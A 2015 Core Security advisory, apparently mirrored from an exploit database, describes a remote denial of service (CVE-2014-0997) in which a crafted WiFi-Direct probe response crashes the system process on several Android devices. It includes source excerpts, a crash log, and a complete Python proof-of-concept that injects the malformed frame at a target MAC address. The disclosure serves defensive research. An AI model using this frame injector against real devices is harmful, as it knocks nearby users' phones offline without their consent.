Android WiFi-Direct – Denial of Service

Exploit Database
123 阅读

作者： Core Security

日期： 2015-01-26
类别：
- dos
平台：
- android
来源：https://www.exploit-db.com/exploits/35913/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

404

405

406

407

408

409

410

411

412

413

414

415

416

417

418

419

420

421

422

423

424

425

426

427

428

429

430

431

432

433

434

435

436

437

438

439

Core Security - Corelabs Advisory

http://corelabs.coresecurity.com/

Android WiFi-Direct Denial of Service

1. *Advisory Information*

Title: Android WiFi-Direct Denial of Service

Advisory ID: CORE-2015-0002

Advisory URL:

http://www.coresecurity.com/advisories/android-wifi-direct-denial-service

Date published: 2015-01-26

Date of last update: 2015-01-26

Vendors contacted: Android Security Team

Release mode: User release

2. *Vulnerability Information*

Class: Uncaught Exception [CWE-248]

Impact: Denial of service

Remotely Exploitable: Yes

Locally Exploitable: No

CVE Name: CVE-2014-0997

3. *Vulnerability Description*

Some Android devices are affected by a Denial of Service attack when

scanning for WiFi Direct devices.

An attacker could send a specially crafted 802.11 Probe Response frame

causing the Dalvik subsystem to reboot because of an Unhandle Exception

on WiFiMonitor class.

4. *Vulnerable Packages*

. Nexus 5 - Android 4.4.4

. Nexus 4 - Android 4.4.4

. LG D806 - Android 4.2.2

. Samsung SM-T310 - Android 4.2.2

. Motorola RAZR HD - Android 4.1.2

Other devices could be also affected.

5. *Non-vulnerable packages*

. Android 5.0.1

. Android 5.0.2

6. *Vendor Information, Solutions and Workarounds*

Some mitigation actions may be to avoid using WiFi-Direct or update

to a non-vulnerable Android version.

Contact vendor for further information.

7. *Credits*

This vulnerability was discovered and researched by Andres Blanco

from the CoreLabs

Team. The publication of this advisory was coordinated by the Core

Advisories

Team.

8. *Technical Description / Proof of Concept Code*

Android makes use of a modified *wpa_supplicant*[1]

in order to provide an interface between the wireless driver and the

Android platform framework.

Below the function that handles *wpa_supplicant* events. This function

returns a jstring from calling NewStringUTF method.

/-----

static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)

{

char buf[EVENT_BUF_SIZE];

int nread = ::wifi_wait_for_event(buf, sizeof buf);

if (nread > 0) {

return env->NewStringUTF(buf);

} else {

return NULL;

}

-----/

The WiFi-Direct specification defines the P2P discovery procedure to

enable P2P

devices to exchange device information, the device name is part of

this information.

The WifiP2pDevice class, located at

/wifi/java/android/net/wifi/p2p/WifiP2pDevice.java,

represents a Wi-Fi p2p device. The constructor method receives the

string provided by

the *wpa_supplicant* and throws an IllegalArgumentException in case

the event is malformed.

Below partial content of the WiFiP2PDevice.java file.

/-----

[...]

/** Detailed device string pattern with WFD info

* Example:

*P2P-DEVICE-FOUND 00:18:6b:de:a3:6e

p2p_dev_addr=00:18:6b:de:a3:6e

*pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E'

config_methods=0x188

*dev_capab=0x21 group_capab=0x9

private static final Pattern detailedDevicePattern =

Pattern.compile(

"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +

"(\\d+ )?" +

"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +

"pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +

"name='(.*)' " +

"config_methods=(0x[0-9a-fA-F]+) " +

"dev_capab=(0x[0-9a-fA-F]+) " +

"group_capab=(0x[0-9a-fA-F]+)" +

"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"

);

[...]

/**

* @param string formats supported include

*P2P-DEVICE-FOUND fa:7b:7a:42:02:13

p2p_dev_addr=fa:7b:7a:42:02:13

*pri_dev_type=1-0050F204-1 name='p2p-TEST1'

config_methods=0x188 dev_capab=0x27

*group_capab=0x0 wfd_dev_info=000006015d022a0032

*P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13

*AP-STA-CONNECTED 42:fc:89:a8:96:09

[p2p_dev_addr=02:90:4c:a0:92:54]

*AP-STA-DISCONNECTED 42:fc:89:a8:96:09

[p2p_dev_addr=02:90:4c:a0:92:54]

*fa:7b:7a:42:02:13

*Note: The events formats can be looked up in the

wpa_supplicant code

* @hide

public WifiP2pDevice(String string) throws

IllegalArgumentException {

String[] tokens = string.split("[ \n]");

Matcher match;

if (tokens.length < 1) {

throw new IllegalArgumentException("Malformed supplicant

event");

}

switch (tokens.length) {

case 1:

/* Just a device address */

deviceAddress = string;

return;

case 2:

match = twoTokenPattern.matcher(string);

if (!match.find()) {

throw new IllegalArgumentException("Malformed

supplicant event");

}

deviceAddress = match.group(2);

return;

case 3:

match = threeTokenPattern.matcher(string);

if (!match.find()) {

throw new IllegalArgumentException("Malformed

supplicant event");

}

deviceAddress = match.group(1);

return;

default:

match = detailedDevicePattern.matcher(string);

if (!match.find()) {

throw new IllegalArgumentException("Malformed

supplicant event");

}

deviceAddress = match.group(3);

primaryDeviceType = match.group(4);

deviceName = match.group(5);

wpsConfigMethodsSupported = parseHex(match.group(6));

deviceCapability = parseHex(match.group(7));

groupCapability = parseHex(match.group(8));

if (match.group(9) != null) {

String str = match.group(10);

wfdInfo = new

WifiP2pWfdInfo(parseHex(str.substring(0,4)),

parseHex(str.substring(4,8)),

parseHex(str.substring(8,12)));

}

break;

}

if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {

status = AVAILABLE;

}

[...]

-----/

On some Android devices when processing a probe response frame with a

WiFi-Direct(P2P)

information element that contains a device name attribute with

specific bytes generates

a malformed supplicant event string that ends up throwing the

IllegalArgumentException.

As this exception is not handled the Android system restarts.

Below partial content of the logcat of a Samsung SM-T310 running

Android 4.2.2.

/-----

I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00

p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5'fa¬¬'

config_methods=0x188 dev_capab=0x21 group_capab=0x0

E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS:

WifiMonitor

E/AndroidRuntime( 2129): java.lang.IllegalArgumentException:

Malformed supplicant event

E/AndroidRuntime( 2129):at

android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)

E/AndroidRuntime( 2129):at

android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)

E/AndroidRuntime( 2129):at

android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)

E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o

/data/log/dumpstate_sys_error

-----/

8.1. *Proof of Concept*

This PoC was implemented using the open source library Lorcon

[2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.

/-----

#!/usr/bin/env python

import sys

import time

import struct

import PyLorcon2

def get_probe_response(source, destination, channel):

frame = str()

frame += "\x50\x00"# Frame Control

frame += "\x00\x00"# Duration

frame += destination

frame += source

frame += "\x00\x00"# Sequence Control

frame += "\x00\x00\x00\x00\x00\x00\x00\x00"# Timestamp

frame += "\x64\x00"# Beacon Interval

frame += "\x30\x04"# Capabilities Information

# SSID IE

frame += "\x00"

frame += "\x07"

frame += "DIRECT-"

# Supported Rates

frame += "\x01"

frame += "\x08"

frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"

# DS Parameter Set

frame += "\x03"

frame += "\x01"

frame += struct.pack("B", channel)

# P2P

frame += "\xDD"

frame += "\x27"

frame += "\x50\x6F\x9A"

frame += "\x09"

# P2P Capabilities

frame += "\x02" # ID

frame += "\x02\x00" # Length

frame += "\x21\x00"

# P2P Device Info

frame += "\x0D" # ID

frame += "\x1B\x00" # Length

frame += source

frame += "\x01\x88"

frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"

frame += "\x00"

frame += "\x10\x11"

frame += "\x00\x06"

frame += "fafa\xFA\xFA"

return frame

def str_to_mac(address):

return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))

if __name__ == "__main__":

if len(sys.argv) != 3:

print "Usage:"

print "poc.py <iface> <target>"

print "Example:"

print "poc.py wlan0 00:11:22:33:44:55"

sys.exit(-1)

iface = sys.argv[1]

destination = str_to_mac(sys.argv[2])

context = PyLorcon2.Context(iface)

context.open_injmon()

channel = 1

source = str_to_mac("00:11:22:33:44:55")

frame = get_probe_response(source, destination, channel)

print "Injecting PoC."

for i in range(100):

context.send_bytes(frame)

time.sleep(0.100)

-----/

9. *Report Timeline*

. 2014-09-26:

Core Security contacts Android security team to inform them that

a vulnerability has been found in Android. Core Security sends a draft

advisory with technical details and PoC files.

. 2014-09-29:

Android Security Team acknowledges reception of the advisory.

. 2014-09-30:

Core Security notifies that the tentative publication date is

set for Oct 20rd, 2014.

. 2014-09-30:

Android Security Team acknowledges.

. 2014-10-16:

Core Security requests a status update.

. 2014-10-16:

Android Security Team responds that they have classify the

vulnerability as low severity and don't currently have a timeline for

releasing a fix.

. 2014-10-20:

Core Security does not completely agrees with the vulnerability

classification and reschedule the publication of the advisory.

. 2014-10-16:

Android Security Team acknowledges and strengthens it's position

that they don't currently have a timeline for releasing a fix.

. 2015-01-06:

Core Security requests a status update.

. 2015-01-12:

Core Security asks for confirmation of reception of the previous

email.

. 2015-01-16:

Android Security Team acknowledges and respond that they don't

currently have a timeline for releasing a fix.

. 2015-01-19:

Core Security notifies that vendor cooperation is needed in

order to keep this process coordinated. If vendor refuses to provide the

requested information the advisory will be released tagged as 'user

release'. The advisory is re-scheduled for January 26th, 2015.

. 2015-01-20:

Android Security Team acknowledges and respond that they don't

currently have a timeline for releasing a fix.

. 2015-01-26:

The advisory CORE-2015-0002 is published.

10. *References*

[1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/

[2] - Lorcon site. https://code.google.com/p/lorcon

[3] - PyLorcon2 site. http://code.google.com/p/pylorcon2

11. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with

anticipating

the future needs and requirements for information security technologies.

We conduct our research in several important areas of computer security

including system vulnerabilities, cyber attack planning and simulation,

source code auditing, and cryptography. Our results include problem

formalization, identification of vulnerabilities, novel solutions and

prototypes for new technologies. CoreLabs regularly publishes security

advisories, technical papers, project information and shared software

tools for public use at:

http://corelabs.coresecurity.com.

12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats

with security test and measurement solutions that continuously identify

and demonstrate real-world exposures to their most critical assets. Our

customers can gain real visibility into their security standing, real

validation of their security controls, and real metrics to more

effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted

research and leading-edge threat expertise from the company's Security

Consulting Services, CoreLabs and Engineering groups. Core Security

Technologies can be reached at +1 (617) 399-6980 or on the Web at:

http://www.coresecurity.com.

13. *Disclaimer*

The contents of this advisory are copyright

and are licensed under a Creative Commons

Attribution Non-Commercial Share-Alike 3.0 (United States) License:

http://creativecommons.org/licenses/by-nc-sa/3.0/us/

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security

advisories team, which is available for download at

http://www.coresecurity.com/files/attachments/core_security_advisories.asc.